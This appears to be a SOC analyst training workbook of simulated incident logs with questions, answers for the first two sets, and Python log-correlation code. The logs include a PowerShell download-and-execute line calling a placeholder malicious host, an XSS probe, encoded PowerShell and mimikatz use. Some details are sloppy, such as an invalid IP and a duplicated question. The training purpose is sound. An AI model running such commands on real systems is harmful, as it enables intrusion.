INCIDENT 11

The document outlines a series of cybersecurity incident analysis exercises, focusing on supply chain compromise, lateral movement detection, data exfiltration analysis, malware analysis, insider threat analysis, and advanced threat hunting. Each section includes logs, alerts, and questions designed to assess understanding of the incidents and the appropriate responses. The exercises highlight various cybersecurity threats and the importance of monitoring and analyzing logs to detect and mitigate potential attacks.

Uploaded by JANO tube

CYBERSECURITY ANALYST INCIDENT ANALYSIS EXERCISES WITH QUESTIONS AND ANSWERS

BY IZZMIER IZZUDDIN

SET 1: SUPPLY CHAIN COMPROMISE

Logs

Firewall Logs

Date: 2024-12-26T03:45:12Z
Source IP: 192.168.1.45
Destination IP: 45.67.89.123
Destination Port: 443
Protocol: HTTPS
Action: ALLOWED
Bytes Sent: 234,657
Bytes Received: 1,045,234

Date: 2024-12-26T03:50:24Z
Source IP: 192.168.1.45
Destination IP: 123.45.67.89
Destination Port: 22
Protocol: SSH
Action: BLOCKED
Bytes Sent: 987
Bytes Received: 0

Date: 2024-12-26T03:55:10Z
Source IP: 192.168.1.100
Destination IP: 8.8.8.8
Destination Port: 53
Protocol: DNS
Query: suspicious-malware-site[.]com
Action: ALLOWED

Endpoint Detection and Response (EDR) Alerts

Alert ID: 109284
Time: 2024-12-26T03:40:10Z
Host: DESKTOP-34HJ82
Severity: High
Detection: Malicious PowerShell Script
Command Line: powershell.exe -EncodedCommand <base64string>
File Path: C:\Users\User\AppData\Local\Temp\update.exe
Action Taken: Quarantined

Alert ID: 109285
Time: 2024-12-26T03:45:15Z
Host: SERVER-01
Severity: Critical
Detection: Suspicious Network Activity
Details: Outbound traffic to IP 45.67.89.123 over HTTPS (Potential C2 Communication)
Action Taken: Blocked by EDR

SIEM Correlation Logs

2024-12-26T03:38:50Z - Correlation Rule Triggered: "Suspicious PowerShell Activity"
Host: DESKTOP-34HJ82
Rule: Base64 encoded PowerShell detected
Details: powershell.exe -EncodedCommand

2024-12-26T03:42:12Z - Correlation Rule Triggered: "Outbound C2 Communication"
Host: SERVER-01
Destination IP: 45.67.89.123
Protocol: HTTPS
Details: Large data transfer detected

2024-12-26T03:44:33Z - Correlation Rule Triggered: "DNS Query for Known Malicious Domain"
Host: DESKTOP-34HJ82
Domain: suspicious-malware-site[.]com
Action: Alerted

DNS Traffic Logs

Timestamp: 2024-12-26T03:35:40Z
Source IP: 192.168.1.45
Query: suspicious-malware-site[.]com
Response: 45.67.89.123

Timestamp: 2024-12-26T03:40:50Z
Source IP: 192.168.1.45
Query: update[.]legit-software[.]com
Response: 23.45.67.89

QUESTIONS

1. What was the initial sign of compromise?
2. What is the significance of the base64-encoded PowerShell command?
3. What was the suspected Command and Control (C2) server?
4. Why was the DNS query for suspicious-malware-site[.]com flagged?
5. What mitigation action did the EDR take on DESKTOP-34HJ82?
6. What is the significance of the blocked SSH attempt in the firewall logs?
7. What protocol was used for potential data exfiltration?
8. How did the SIEM correlate the DNS traffic with the malicious activity?
9. What additional logs should be analysed to confirm lateral movement?
10. How can future attacks of this nature be mitigated?

SET 2: LATERAL MOVEMENT DETECTION

Logs

Windows Event Logs

Date: 2024-12-26T03:50:20Z
Event ID: 4624
Logon Type: 3
Account Name: attacker_account
Source Network Address: 192.168.1.45
Target: SERVER-01
Authentication Package: NTLM
Status: Success

Date: 2024-12-26T03:52:30Z
Event ID: 4625
Logon Type: 3
Account Name: admin_user
Source Network Address: 192.168.1.45
Target: SERVER-02
Authentication Package: NTLM
Status: Failed

Date: 2024-12-26T03:54:00Z
Event ID: 4673
Process: rundll32.exe
Privilege: SeDebugPrivilege
Target: C:\Windows\System32\winlogon.exe
Result: Success

Date: 2024-12-26T03:55:10Z
Event ID: 4688
New Process Created: C:\Windows\Temp\malicious_script.ps1
Account Name: SYSTEM
Parent Process: C:\Windows\System32\svchost.exe

SIEM Correlation Logs

2024-12-26T03:50:25Z - Correlation Rule Triggered: "Successful Lateral Movement"
Host: SERVER-01
Source: DESKTOP-34HJ82
Account: attacker_account
Protocol: SMB
Action: Alerted

2024-12-26T03:55:12Z - Correlation Rule Triggered: "Privilege Escalation Attempt"
Host: SERVER-02
Account: SYSTEM
Details: SeDebugPrivilege enabled
Action: Alerted

2024-12-26T03:55:15Z - Correlation Rule Triggered: "Malicious PowerShell Execution"
Host: SERVER-02
File: malicious_script.ps1
Action: Alerted

Network Traffic Logs

Timestamp: 2024-12-26T03:50:18Z
Source IP: 192.168.1.45
Destination IP: 192.168.1.50
Protocol: SMB
Action: Allowed

Timestamp: 2024-12-26T03:55:00Z
Source IP: 192.168.1.50
Destination IP: 192.168.1.51
Protocol: RDP
Action: Allowed

QUESTIONS

1. What indicates a successful lateral movement attempt in the logs?
2. What is the significance of Event ID 4625 in the logs?
3. What privilege escalation attempt is visible in the logs?
4. What process was executed after gaining elevated privileges?
5. Which protocol was used for lateral movement?
6. What suspicious activity occurred on SERVER-02 after lateral movement?
7. How did the SIEM correlate lateral movement events?
8. What can be inferred from the RDP traffic in the network logs?
9. What could be the attacker's objective based on the logs?
10. What mitigations could prevent this type of lateral movement?

SET 3: DATA EXFILTRATION ANALYSIS

Logs

Firewall Logs

Date: 2024-12-26T04:10:15Z
Source IP: 192.168.1.50
Destination IP: 45.67.89.123
Destination Port: 443
Protocol: HTTPS
Action: ALLOWED
Bytes Sent: 4,503,241
Bytes Received: 1,023,109

Date: 2024-12-26T04:15:10Z
Source IP: 192.168.1.50
Destination IP: 89.67.45.123
Destination Port: 80
Protocol: HTTP
Action: BLOCKED
Bytes Sent: 9,432
Bytes Received: 0

SIEM Correlation Logs

2024-12-26T04:09:50Z - Correlation Rule Triggered: "Unusual Data Transfer Volume"
Host: SERVER-02
Destination: 45.67.89.123
Data Sent: 4.5 MB
Action: Alerted

2024-12-26T04:11:30Z - Correlation Rule Triggered: "Suspicious Domain Activity"
Host: SERVER-02
Domain: malware-c2[.]com
Action: Alerted

Proxy Logs

Date: 2024-12-26T04:10:12Z
User: SYSTEM
URL: https://45.67.89.123/upload
Request Size: 4,503,241 bytes
Response Code: 200 OK

Date: 2024-12-26T04:15:05Z
User: SYSTEM
URL: http://malware-c2[.]com/exfil
Request Size: 9,432 bytes
Response Code: Blocked

DNS Traffic Logs

Date: 2024-12-26T04:09:40Z
Source IP: 192.168.1.50
Query: malware-c2[.]com
Response: 89.67.45.123

Date: 2024-12-26T04:10:05Z
Source IP: 192.168.1.50
Query: upload.malicious-c2[.]com
Response: 45.67.89.123

QUESTIONS

1. What was the size of the data exfiltrated during the attack?
2. Which protocol was used for data exfiltration?
3. What domain is associated with the data exfiltration attempt?
4. What triggered the SIEM's "Unusual Data Transfer Volume" rule?
5. What action was taken against the HTTP data exfiltration attempt?
6. What other evidence suggests malicious intent in the data exfiltration?
7. Why is using HTTPS advantageous for attackers during data exfiltration?
8. What additional steps can be taken to confirm the content of the exfiltrated data?
9. What mitigation measures could prevent such data exfiltration in the future?
10. How can threat intelligence enhance detection of such attacks?

SET 4: MALWARE ANALYSIS

Logs

Endpoint Detection Logs

Date: 2024-12-26T04:30:05Z
Alert: "Suspicious File Downloaded"
File Name: payload.exe
Hash: a1b2c3d4e5f67890abcdef1234567890
Download URL: http://malicious-site[.]com/payload.exe
User: SYSTEM
Action: Alerted

Date: 2024-12-26T04:32:10Z
Alert: "Malware Execution Detected"
Process: payload.exe
Parent Process: explorer.exe
Host: SERVER-02
Action: Quarantined

Date: 2024-12-26T04:35:20Z
Alert: "Persistence Mechanism Detected"
File: C:\Windows\System32\startuplink.dll
Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup
Action: Alerted

File Hash Analysis

File Name: payload.exe
Hash: a1b2c3d4e5f67890abcdef1234567890
VirusTotal: Detected by 54/60 vendors
Tags: Trojan, C2 Communication, Persistence
Behavior: Creates registry entries, modifies system files, connects to C2 servers.

Network Traffic Logs

Timestamp: 2024-12-26T04:31:00Z
Source IP: 192.168.1.50
Destination IP: 203.0.113.42
Protocol: HTTP
URL: http://malicious-site[.]com/payload.exe
Action: Allowed

Timestamp: 2024-12-26T04:35:00Z
Source IP: 192.168.1.50
Destination IP: 203.0.113.50
Protocol: HTTPS
Action: Allowed
Bytes Sent: 1,500
Bytes Received: 6,200

Windows Event Logs

Date: 2024-12-26T04:32:15Z
Event ID: 4688
New Process Created: C:\Users\Admin\AppData\Local\Temp\payload.exe
Account Name: SYSTEM
Parent Process: explorer.exe

Date: 2024-12-26T04:34:10Z
Event ID: 4657
Registry Value Modified:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\malware_startup
Process: regedit.exe

QUESTIONS

1. What is the name of the suspicious file detected on the endpoint?
2. Where was the malware downloaded from?
3. What did the malware attempt to do after execution?
4. How was the malware identified as malicious?
5. Which registry key was modified as part of the malware's persistence mechanism?
6. What C2 communication was detected in the network traffic logs?
7. What was the parent process for the malicious executable?
8. What specific mitigations could have stopped this malware earlier in the kill chain?
9. How would you ensure the malware is completely removed from the system?
10. How can the SOC team strengthen defenses against similar attacks?

SET 5: INSIDER THREAT ANALYSIS

Logs

HR Records

Employee: Izzmier
Role: Database Administrator
Last Performance Review: 2024-11-01 (Satisfactory)
Resignation Notice: 2024-12-20 (Effective 2024-12-31)
Recent Complaints: None Logged

Database Access Logs

Date: 2024-12-25T21:05:00Z
User: Izzmier
Database: Finance_DB
Action: SELECT * FROM customer_data
Records Affected: 1,000,000
Source IP: 192.168.1.102

Date: 2024-12-25T21:15:00Z
User: Izzmier
Database: Finance_DB
Action: Export customer_data to file
File Name: customers_2024.csv
Records Exported: 1,000,000

Endpoint Logs

Date: 2024-12-25T21:20:00Z
User: Izzmier
File: C:\Users\Izzmier\Desktop\customers_2024.csv
Action: Uploaded to external drive
Device: USB Device (Vendor: Generic, Serial: A123B456)
Action: Completed

Network Traffic Logs

Date: 2024-12-25T21:30:00Z
Source IP: 192.168.1.102
Destination IP: 203.0.113.200
Protocol: HTTPS
Data Transferred: 10 MB
Action: Allowed

Access Anomalies

Date: 2024-12-25T21:05:00Z
Alert: "Database Access Outside Normal Hours"
User: Izzmier
Triggered Rule: "Access to sensitive tables after business hours"

QUESTIONS

1. What suspicious activity was performed by the user?
2. What mechanism was used to transfer the exported file?
3. Why is this behavior considered suspicious?
4. What rule triggered the alert in the SIEM system?
5. Was there any indication of external sharing of the exported data?
6. What additional evidence confirms data exfiltration?
7. What steps should be taken to mitigate the incident immediately?
8. How could this incident have been prevented?
9. What potential business impacts could arise from this incident?
10. What corrective actions should be taken for future insider threats?

SET 6: ADVANCED THREAT HUNTING

Logs

Threat Intelligence Report

Threat Actor: APT-29
Techniques: Credential Dumping, Lateral Movement, Data Exfiltration
Known C2 IPs: 104.21.65.140, 192.0.2.55
Malware Used: StealthShell v4.3
Observed Activity: Spear-phishing campaigns targeting financial institutions.

Firewall Logs

Timestamp: 2024-12-20T23:45:12Z
Source IP: 192.0.2.55
Destination IP: 192.168.10.5
Protocol: HTTPS
Action: Allowed
Bytes Sent: 2,000
Bytes Received: 15,500

Timestamp: 2024-12-21T00:30:45Z
Source IP: 104.21.65.140
Destination IP: 192.168.10.10
Protocol: HTTPS
Action: Allowed
Bytes Sent: 3,500
Bytes Received: 20,700

Endpoint Detection Logs

Date: 2024-12-21T01:05:00Z
Alert: "Suspicious PowerShell Script Execution"
Process: powershell.exe
Command: "iex(New-Object Net.WebClient).DownloadString('http://malicious-site[.]com/init.ps1')"
Host: SERVER-DB01
Action: Blocked

Date: 2024-12-21T01:10:00Z
Alert: "Credential Dumping Detected"
Tool: mimikatz.exe
Process Path: C:\Temp\mimikatz.exe
User: Administrator
Host: SERVER-APP01
Action: Quarantined

Active Directory Logs

Date: 2024-12-21T01:15:00Z
Event ID: 4625
Failed Login Attempt
User: Administrator
Source Workstation: SERVER-APP01

Date: 2024-12-21T01:16:00Z
Event ID: 4672
Privileged Access Granted
User: SYSTEM
Source Workstation: SERVER-DB01

SIEM Alerts

Date: 2024-12-21T01:20:00Z
Alert: "Multiple Host Compromises Detected"
Source: Threat Correlation Engine
Severity: High
Hosts Involved: SERVER-DB01, SERVER-APP01, SERVER-FILE01

QUESTIONS

1. What is the suspected threat actor involved in this incident?
2. Which hosts are identified as compromised?
3. What malicious tool was used for credential dumping?
4. What PowerShell command was executed on SERVER-DB01 and what was its purpose?
5. Which two external IPs were communicating with the internal network and why is this significant?
6. How was privileged access granted during the attack?
7. What indicators of compromise (IOCs) should be shared with other teams for proactive defense?
8. What immediate containment actions should be taken for this incident?
9. What detection gaps were exploited by the attacker?
10. How can threat hunting processes be improved to prevent future incidents?

SET 7: ZERO-DAY EXPLOIT INCIDENT

Logs

Web Server Logs

Date: 2024-12-22T10:12:45Z
IP Address: 203.0.113.45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Request: POST /vulnerable_endpoint.php HTTP/1.1
Payload: {"input":"<script>alert('XSS')</script>"}
Response Code: 500 (Internal Server Error)

Date: 2024-12-22T10:13:30Z
IP Address: 203.0.113.45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Request: POST /vulnerable_endpoint.php HTTP/1.1
Payload: {"input":"<malicious_code>shell_upload</malicious_code>"}
Response Code: 200 (Success)

Network Traffic Logs

Date: 2024-12-22T10:14:15Z
Source IP: 203.0.113.45
Destination IP: 192.168.10.20
Protocol: HTTP
Bytes Sent: 1,500
Bytes Received: 25,000
Action: Allowed

Date: 2024-12-22T10:15:00Z
Source IP: 192.168.10.20
Destination IP: 203.0.113.46
Protocol: HTTPS
Bytes Sent: 10,000
Bytes Received: 500
Action: Allowed

File System Logs

Date: 2024-12-22T10:13:40Z
File Created: /var/www/html/uploads/malicious_shell.php
User: www-data
Process: apache2
Action: Write

Date: 2024-12-22T10:15:10Z
File Executed: /var/www/html/uploads/malicious_shell.php
User: www-data
Process: php
Action: Execute

SIEM Correlation Alerts

Date: 2024-12-22T10:15:30Z
Alert: "Suspicious File Upload Detected"
Severity: Critical
Description: File 'malicious_shell.php' uploaded and executed on Web Server.
Host: WEB-SERVER01
Source IP: 203.0.113.45
Destination IP: 192.168.10.20

Threat Intelligence Feed

Zero-Day Exploit: CVE-2024-XXXX
Vulnerable Component: Custom PHP File Upload Module
Impact: Remote Code Execution
Mitigation: Patch unavailable, recommend disabling affected functionality.

QUESTIONS

1. What type of attack is observed in this incident?
2. How did the attacker gain access to the web server?
3. What was the IP address of the attacker?
4. What actions were taken by the malicious file after upload?
5. Which hosts were involved in the network traffic during the incident?
6. What immediate containment steps should be taken?
7. How should the vulnerability be mitigated, considering no patch is available?
8. What proactive measures could have prevented this attack?
9. What logs provided evidence of the malicious activity?
10. What potential impact could this attack have if not contained?

SET 8: SUPPLY CHAIN ATTACK SIMULATION

Logs

Email Logs

Date: 2024-12-23T08:15:30Z
From: [email protected]
To: [email protected]
Subject: Urgent: Security Patch Update
Attachment: update_security_patch.exe

Date: 2024-12-23T08:16:00Z
User: [email protected]
Action: Opened attachment

Endpoint Detection Logs

Date: 2024-12-23T08:17:15Z
Alert: "Unrecognised Executable File Execution"
Process: update_security_patch.exe
File Hash: e3b0c44298fc1c149afbf4c8996fb924
Action: Blocked
Host: WORKSTATION-102

Date: 2024-12-23T08:17:45Z
Alert: "Unauthorised PowerShell Script Execution"
Command: powershell.exe -nop -w hidden -encodedcommand "YXBwIHJ1bnMgdXByYW5jIGFuZCB1cGxvYWRzIG1hbHdhcmU="
Host: WORKSTATION-102
Action: Allowed

Firewall Logs

Date: 2024-12-23T08:18:10Z
Source IP: 192.168.10.102
Destination IP: 192.0.2.200
Protocol: HTTPS
Action: Allowed
Bytes Sent: 5,000
Bytes Received: 500

Date: 2024-12-23T08:19:00Z
Source IP: 192.168.10.102
Destination IP: 203.0.113.10
Protocol: HTTPS
Action: Allowed
Bytes Sent: 10,500
Bytes Received: 15,000

SIEM Correlation Alerts

Date: 2024-12-23T08:20:00Z
Alert: "Possible Supply Chain Compromise"
Severity: Critical
Description: Suspicious executable (update_security_patch.exe) detected from a vendor email.
Affected Host: WORKSTATION-102

DNS Query Logs

Date: 2024-12-23T08:21:30Z
Source: WORKSTATION-102
Queried Domain: malicious-c2[.]com
Response: 203.0.113.10

QUESTIONS

1. How did the attacker deliver the malicious payload?
2. What file was executed by the target user and what was its hash?
3. What suspicious activity occurred on the workstation after the file execution?
4. What are the suspected Command-and-Control (C2) IPs?
5. What immediate actions should be taken to contain the threat?
6. What indicators suggest this was a supply chain attack?
7. How can the organisation validate the legitimacy of the vendor’s email?
8. What logs provided evidence of communication with malicious infrastructure?
9. What steps should be taken to determine the scope of this compromise?
10. What steps should be taken to determine the scope of this compromise?

SET 9: CLOUD MISCONFIGURATION EXPLOITATION

Logs

Cloud Access Logs

Date: 2024-12-24T03:10:45Z
User: anonymous
Action: GET
Resource: s3://sensitive-data-bucket/financial_report_2024.xlsx
Response Code: 200 (Success)
Source IP: 203.0.113.55

Date: 2024-12-24T03:11:30Z
User: anonymous
Action: LIST
Resource: s3://sensitive-data-bucket/
Response Code: 200 (Success)
Source IP: 203.0.113.55

Date: 2024-12-24T03:12:10Z
User: anonymous
Action: DELETE
Resource: s3://sensitive-data-bucket/backups/
Response Code: 204 (No Content)
Source IP: 203.0.113.55

Firewall Logs

Date: 2024-12-24T03:09:00Z
Source IP: 203.0.113.55
Destination IP: 192.0.2.100
Protocol: HTTPS
Bytes Sent: 3,500
Bytes Received: 10,000
Action: Allowed

Date: 2024-12-24T03:10:00Z
Source IP: 203.0.113.55
Destination IP: 192.0.2.101
Protocol: HTTPS
Bytes Sent: 5,000
Bytes Received: 20,000
Action: Allowed

Cloud Security Alerts

Date: 2024-12-24T03:13:00Z
Alert: "Publicly Accessible Bucket Detected"
Severity: High
Resource: s3://sensitive-data-bucket/

SIEM Correlation Alerts

Date: 2024-12-24T03:15:30Z
Alert: "Suspicious Anonymous Access to Cloud Bucket"
Severity: Critical
Description: Anonymous user accessed and modified sensitive data in cloud storage.
Affected Resource: s3://sensitive-data-bucket/
Source IP: 203.0.113.55

Threat Intelligence Feed

Indicator: 203.0.113.55
Category: Known Threat Actor
Description: IP associated with cloud bucket exploitation and ransomware deployment.

QUESTIONS

1. What vulnerability allowed the attacker to access sensitive data?
2. What actions did the attacker perform on the cloud bucket?
3. What is the source IP of the attacker and why is it significant?
4. What was the first indication of the attack?
5. What immediate steps should be taken to contain the attack?
6. How could this misconfiguration have been prevented?
7. What additional risks does this incident pose?
8. What further investigation is needed after containment?
9. What tools can be used to monitor cloud security more effectively?
10. What policies should be implemented to prevent similar incidents?

SET 10: AI-POWERED MALWARE ATTACK SIMULATION

Logs

Email Logs

Date: 2024-12-25T14:10:30Z
From: [email protected]
To: [email protected]
Subject: [Urgent] System Performance Analysis Required
Body: Dear User,
Our automated system has detected unusual performance issues in your workstation. Please download and run the attached diagnostic tool immediately to avoid system shutdown.
Attachment: performance_analysis_tool.exe

Endpoint Detection Logs

Date: 2024-12-25T14:12:00Z
Alert: "Suspicious Executable File Detected"
Process: performance_analysis_tool.exe
File Hash: 8df48e58b0a1fcb99eabcd00112d34f7
Action: Allowed
Host: WORKSTATION-305

Date: 2024-12-25T14:12:15Z
Alert: "AI-Driven Malware Behavior Detected"
Process: AI_malware.exe (spawned by performance_analysis_tool.exe)
Action: Allowed
Behavior: Data exfiltration pattern recognised.

Network Traffic Logs

Date: 2024-12-25T14:13:30Z
Source IP: 192.168.15.305
Destination IP: 198.51.100.45
Protocol: HTTPS
Bytes Sent: 15,000
Bytes Received: 3,500
Action: Allowed

Date: 2024-12-25T14:14:00Z
Source IP: 192.168.15.305
Destination IP: 203.0.113.20
Protocol: HTTPS
Bytes Sent: 50,000
Bytes Received: 10,000
Action: Allowed

SIEM Correlation Alerts

Date: 2024-12-25T14:15:00Z
Alert: "High-Speed Data Exfiltration Detected"
Severity: Critical
Source: WORKSTATION-305
Destination: External IPs (198.51.100.45, 203.0.113.20)
Description: Large volumes of data exfiltrated in a short time frame.

AI Behavior Analysis Logs

Date: 2024-12-25T14:16:00Z
Process: AI_malware.exe
Behavior: Adaptive and polymorphic. Changed hash to 4a8b3f9c0ef12a67edbc34500d1f78de.
Capabilities Detected:
- Real-time evasion of antivirus.
- AI-driven identification of unprotected files.
- Use of stealthy exfiltration methods (encrypted HTTPS channels).

Threat Intelligence Feed

Indicator: 198.51.100.45, 203.0.113.20
Category: Known C2 Servers
Description: Associated with recent AI-powered malware campaigns targeting enterprises.

QUESTIONS

1. How was the malware delivered to the target?
2. What behavior was observed from the malware upon execution?
3. What external IPs were involved in the data exfiltration and what are they associated with?
4. What is the hash of the original and polymorphic malware files?
5. What were the volumes of data exfiltrated to the C2 servers?
6. What immediate containment steps should be taken?
7. What advanced defenses could mitigate AI-driven malware?
8. What makes this attack particularly challenging to defend against?
9. How can the organisation improve its phishing defenses?
10. What follow-up investigations are necessary?

ANSWERS

SET 1

1. What was the initial sign of compromise?

Answer: A malicious PowerShell script executed on DESKTOP-34HJ82 was detected by the EDR.

2. What is the significance of the base64-encoded PowerShell command?

Answer: Base64 encoding is commonly used by attackers to obfuscate malicious commands, making them harder to detect.

3. What was the suspected Command and Control (C2) server?

Answer: The IP 45.67.89.123 was identified as the C2 server based on the HTTPS traffic
logs.

4. Why was the DNS query for suspicious-malware-site[.]com flagged?

Answer: It is a known malicious domain commonly associated with malware distribution.

5. What mitigation action did the EDR take on DESKTOP-34HJ82?

Answer: The EDR quarantined the file update.exe and blocked suspicious network
activity.

6. What is the significance of the blocked SSH attempt in the firewall logs?

Answer: It suggests an attacker may have been attempting lateral movement or privilege escalation within the network.

7. What protocol was used for potential data exfiltration?

Answer: The HTTPS protocol was used for large data transfers to the suspected C2
server.

8. How did the SIEM correlate the DNS traffic with the malicious activity?

Answer: The SIEM rule matched the DNS query to a list of known malicious domains
and correlated it with the outbound network traffic.

9. What additional logs should be analysed to confirm lateral movement?

Answer: Analyse Windows Event Logs for login attempts, remote execution commands
and other suspicious activity.

10. How can future attacks of this nature be mitigated?

Answer: Implement strict update validation processes, regular DNS monitoring and
enhanced endpoint controls.
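
The correlation described in answers 4 and 8 (a DNS answer for a blocklisted domain, followed by an outbound flow from the same client to the IP that answer returned), as an added Python example that is not part of the original exercise. The log text is constructed from the Set 1 entries above in the page's own "Key: Value" block format; the 30-minute window and the blocklist contents are assumptions.

```python
"""Correlate DNS answers for blocklisted domains with later outbound firewall
flows, the way the "DNS Query for Known Malicious Domain" and "Outbound C2
Communication" rules in Set 1 fire together."""
from datetime import datetime, timedelta

# Constructed sample input, copied from the Set 1 DNS and firewall logs.
DNS_LOG = """\
Timestamp: 2024-12-26T03:35:40Z
Source IP: 192.168.1.45
Query: suspicious-malware-site[.]com
Response: 45.67.89.123

Timestamp: 2024-12-26T03:40:50Z
Source IP: 192.168.1.45
Query: update[.]legit-software[.]com
Response: 23.45.67.89
"""

FIREWALL_LOG = """\
Date: 2024-12-26T03:45:12Z
Source IP: 192.168.1.45
Destination IP: 45.67.89.123
Destination Port: 443
Protocol: HTTPS
Action: ALLOWED
Bytes Sent: 234,657
Bytes Received: 1,045,234

Date: 2024-12-26T03:50:24Z
Source IP: 192.168.1.45
Destination IP: 123.45.67.89
Destination Port: 22
Protocol: SSH
Action: BLOCKED
Bytes Sent: 987
Bytes Received: 0
"""

# Threat-intel blocklist (assumption: the page names only this one domain).
BLOCKLIST = {"suspicious-malware-site.com"}


def parse_blocks(text):
    """Split a log into records: blank-line separated 'Key: Value' blocks."""
    records = []
    for chunk in text.strip().split("\n\n"):
        rec = {}
        for line in chunk.splitlines():
            key, _, value = line.partition(": ")
            rec[key.strip()] = value.strip()
        records.append(rec)
    return records


def refang(domain):
    """Turn a defanged indicator like example[.]com back into example.com."""
    return domain.replace("[.]", ".")


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def correlate(dns_text, fw_text, blocklist, window=timedelta(minutes=30)):
    """Return one finding per outbound flow whose destination IP was handed
    out by a DNS answer for a blocklisted domain to the same client within
    `window` before the flow."""
    resolutions = [
        r for r in parse_blocks(dns_text) if refang(r["Query"]) in blocklist
    ]
    findings = []
    for flow in parse_blocks(fw_text):
        flow_time = parse_ts(flow["Date"])
        for res in resolutions:
            age = flow_time - parse_ts(res["Timestamp"])
            same_client = res["Source IP"] == flow["Source IP"]
            same_dest = res["Response"] == flow["Destination IP"]
            if same_client and same_dest and timedelta(0) <= age <= window:
                findings.append({
                    "host": flow["Source IP"],
                    "domain": res["Query"],
                    "c2_ip": flow["Destination IP"],
                    "port": flow["Destination Port"],
                    "action": flow["Action"],
                    # Firewall byte counts use thousands separators on the page.
                    "bytes_sent": int(flow["Bytes Sent"].replace(",", "")),
                })
    return findings


if __name__ == "__main__":
    for f in correlate(DNS_LOG, FIREWALL_LOG, BLOCKLIST):
        print(f"{f['host']} resolved {f['domain']} -> {f['c2_ip']}, then sent "
              f"{f['bytes_sent']} bytes to port {f['port']} ({f['action']})")
```

The blocked SSH flow to 123.45.67.89 produces no finding because no blocklisted domain resolved to that address; it stays a separate lead, as answer 6 treats it.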

SET 2

1. What indicates a successful lateral movement attempt in the logs?

Answer: The Windows Event Log (Event ID 4624) shows a successful login using the
account attacker_account from 192.168.1.45 to SERVER-01.

2. What is the significance of Event ID 4625 in the logs?

Answer: Event ID 4625 indicates a failed login attempt on SERVER-02 by the admin_user,
suggesting the attacker was probing for valid credentials.

3. What privilege escalation attempt is visible in the logs?

Answer: Event ID 4673 shows that the attacker used rundll32.exe to enable
SeDebugPrivilege, which is often exploited to gain higher privileges.

4. What process was executed after gaining elevated privileges?

Answer: A malicious PowerShell script (malicious_script.ps1) was executed, as shown in Event ID 4688.

5. Which protocol was used for lateral movement?

Answer: The logs indicate that the attacker used the SMB protocol for lateral movement
between hosts.

6. What suspicious activity occurred on SERVER-02 after lateral movement?

Answer: The attacker executed a malicious PowerShell script and enabled SeDebugPrivilege on SERVER-02, indicating privilege escalation.

7. How did the SIEM correlate lateral movement events?

Answer: The SIEM identified a pattern of suspicious logins, privilege escalation and
process creation that triggered correlation rules for lateral movement.

8. What can be inferred from the RDP traffic in the network logs?

Answer: The attacker may have used RDP from 192.168.1.50 to 192.168.1.51 to maintain
remote access after achieving lateral movement.

9. What could be the attacker's objective based on the logs?

Answer: The attacker appears to be moving laterally to access sensitive systems, escalate
privileges and establish persistence.

10. What mitigations could prevent this type of lateral movement?

Answer: Implementing least privilege, network segmentation, multi-factor authentication and strict monitoring of privilege escalation attempts can mitigate such attacks.
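
The event chain the SIEM correlates in answers 1 to 7 (network logon, failed logon for a second account from the same source, sensitive-privilege use, then a SYSTEM process from a Temp path), as an added Python example that is not part of the original document. The events are constructed from the Set 2 Windows Event Logs; the stage names, the set of sensitive privileges, the suspicious directories and the "full chain" rule are assumptions.

```python
"""Chain Windows Security events into one lateral-movement finding.
Event IDs used: 4624 (logon), 4625 (failed logon), 4673 (sensitive privilege
use), 4688 (process creation)."""
from datetime import datetime

# Constructed from the page's Set 2 Windows Event Logs.
EVENTS = [
    {"Date": "2024-12-26T03:50:20Z", "Event ID": 4624, "Logon Type": 3,
     "Account Name": "attacker_account", "Source Network Address": "192.168.1.45",
     "Target": "SERVER-01", "Authentication Package": "NTLM", "Status": "Success"},
    {"Date": "2024-12-26T03:52:30Z", "Event ID": 4625, "Logon Type": 3,
     "Account Name": "admin_user", "Source Network Address": "192.168.1.45",
     "Target": "SERVER-02", "Authentication Package": "NTLM", "Status": "Failed"},
    {"Date": "2024-12-26T03:54:00Z", "Event ID": 4673, "Process": "rundll32.exe",
     "Privilege": "SeDebugPrivilege",
     "Target": "C:\\Windows\\System32\\winlogon.exe", "Result": "Success"},
    {"Date": "2024-12-26T03:55:10Z", "Event ID": 4688,
     "New Process Created": "C:\\Windows\\Temp\\malicious_script.ps1",
     "Account Name": "SYSTEM",
     "Parent Process": "C:\\Windows\\System32\\svchost.exe"},
]

# Assumptions: privileges and directories that warrant a stage on their own.
SENSITIVE_PRIVS = {"SeDebugPrivilege", "SeTcbPrivilege", "SeImpersonatePrivilege"}
SUSPICIOUS_DIRS = ("\\temp\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
# Stages that must all be present for the finding to count as a full chain.
REQUIRED = {"network_logon", "privilege_use", "system_exec_from_temp"}


def ts(event):
    return datetime.strptime(event["Date"], "%Y-%m-%dT%H:%M:%SZ")


def detect_chain(events):
    """Walk events in time order and record each stage of the chain.
    Returns the source address, the stages seen and whether the chain is complete."""
    stages = []
    source = None
    logged_in = set()  # accounts that already succeeded with a network logon
    for ev in sorted(events, key=ts):
        eid = ev["Event ID"]
        if (eid == 4624 and ev.get("Logon Type") == 3
                and ev.get("Authentication Package") == "NTLM"):
            source = ev["Source Network Address"]
            logged_in.add(ev["Account Name"])
            stages.append(("network_logon", ev["Date"],
                           f"{ev['Account Name']}@{ev['Target']} from {source}"))
        elif (eid == 4625 and source
                and ev.get("Source Network Address") == source
                and ev["Account Name"] not in logged_in):
            # Same source now trying a different account: credential probing.
            stages.append(("credential_probe", ev["Date"],
                           f"{ev['Account Name']}@{ev['Target']} failed"))
        elif (eid == 4673 and ev.get("Privilege") in SENSITIVE_PRIVS
                and ev.get("Result") == "Success"):
            stages.append(("privilege_use", ev["Date"],
                           f"{ev['Process']} used {ev['Privilege']}"))
        elif eid == 4688:
            path = ev["New Process Created"]
            if (ev.get("Account Name") == "SYSTEM"
                    and any(d in path.lower() for d in SUSPICIOUS_DIRS)):
                stages.append(("system_exec_from_temp", ev["Date"], path))
    names = {name for name, _, _ in stages}
    return {
        "source": source,
        "stages": stages,
        "lateral_movement": REQUIRED <= names,
    }


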